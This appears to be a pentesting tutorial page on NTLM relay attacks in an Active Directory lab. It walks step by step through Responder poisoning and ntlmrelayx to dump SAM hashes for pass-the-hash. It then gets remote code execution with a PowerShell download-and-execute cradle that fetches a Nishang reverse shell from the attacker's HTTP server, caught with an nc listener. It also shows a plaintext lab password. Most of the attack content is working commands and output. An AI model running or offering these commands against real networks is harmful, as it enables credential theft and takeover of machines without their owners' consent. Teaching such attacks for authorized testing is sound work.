# NTLM Relay

Imagine we have a user that is Administrator in other computer. We could use its power to extract the SAM hashes, even execute remote commands.

For example:

Sara Ardila is now Administrator over Carlos Villamizar (computer).

```bash
crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'
```

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FkoQclBcxdTJNbhPEgyxk%2Fimage.png?alt=media&#x26;token=42cee19e-c713-4635-a075-6499c2ba8f70" alt=""><figcaption></figcaption></figure>

## Extract SAM hashes

We need to create a file of targets (in this case PC-CARLOS):

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FHKxSOlK1X53cDAdsF98A%2Fimage.png?alt=media&#x26;token=a3853a2a-a8c4-4cc9-8e0f-ccac3042c04e" alt=""><figcaption></figcaption></figure>

And then, update the Responder.py configuration:

> From here <https://github.com/lgandx/Responder>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FjqJVDWTDAfh6zgKhCK2G%2Fimage.png?alt=media&#x26;token=f82fa837-1f47-45a7-a0b0-fe4670e28b53" alt=""><figcaption></figcaption></figure>

```bash
sudo python3 Responder/Responder.py -I eth0
```

Now, execute ntlmrelayx:

```bash
python3 ntlmrelayx.py -tf targets.txt -smb2support
```

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FEdCrJraXWNim2c1Ptxya%2Fimage.png?alt=media&#x26;token=2ccd8b72-6a4d-458c-a66f-40826906500e" alt=""><figcaption></figcaption></figure>

So, knowing that Sara is administrator over Carlos, we need to wait for a connection from Sara with a service or task. Using that poisoning on the network, we can trick the connection to travel across the network and end in our Responder, this will lead to take the privileges from the user Sara over Carlos and will do the magic using the ntlmrelayx.py program.

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2F6ytUTSPIc8DzGqVyoZtX%2Fimage.png?alt=media&#x26;token=5240b359-f09a-4ea4-b36a-72cb9a58cb50" alt=""><figcaption></figcaption></figure>

In Responder:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FeJMPrxFQFjo1ttHQbgTB%2Fimage.png?alt=media&#x26;token=d5c307a3-a38d-4664-9d67-04c9ae656bf8" alt=""><figcaption></figcaption></figure>

And ntlmrelayx:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FtO51HFHrey0FuGtfPDQb%2Fimage.png?alt=media&#x26;token=c0d6646e-50ed-420a-b2aa-4713a40dc3d1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FrIpCo5AAtuTjEPDPgX9z%2Fimage.png?alt=media&#x26;token=e8091074-c4d3-4ec3-aff8-5f9c31446e40" alt=""><figcaption></figcaption></figure>

And we are dumping SAM hashes, with these we can do Pass-The-Hash.

## Execute remote commands

From here <https://github.com/samratashok/nishang>

```bash
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1
```

Take the line 20:

```powershell
19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
```

Copy its content to the bottom of the file and change the values:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2Fi6fAG9ZQybsNOSnSOZf9%2Fimage.png?alt=media&#x26;token=c1ab11b7-91ea-477c-8cbf-4a4e220fd019" alt=""><figcaption></figcaption></figure>

Now, serve that file and start a listener in the 4460 port to receive the PowerShell Reverse Shell:

```bash
➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```bash
➧ nc -lvp 4460
listening on [any] 4460 ...
```

Now, execute ntlmrelayx:

```bash
python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"
```

With this, we are reaching the file in our server and importing its content, as we have the last line uncommented, that line will be executed after being imported.

Now, start our Responder (remember, with SMB and HTTP `Off`):

```bash
sudo python3 Responder/Responder.py -I eth0
```

Wait for the connection from Sara to a invalid or down service/task/folder:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FakXwkPBanQmJQgbh4J2w%2Fimage.png?alt=media&#x26;token=7d6e0e31-2e1c-442d-9663-6f8cdea6226c" alt=""><figcaption></figcaption></figure>

In our listener:

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FNcn0ZjUJwsJs7myu4m5N%2Fimage.png?alt=media&#x26;token=f02d4485-8b58-4848-a97c-5ca648caa4b9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://344105405-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFJ8sxzGfhnecDpAjrc%2Fuploads%2FZHtCgCQ4Dt1NIkVU7c11%2Fimage.png?alt=media&#x26;token=2bc80414-64fb-4552-aa00-c51758b72867" alt=""><figcaption></figcaption></figure>

We are inside CarlosPC exploiting the privilege from Sara in CarlosPC :O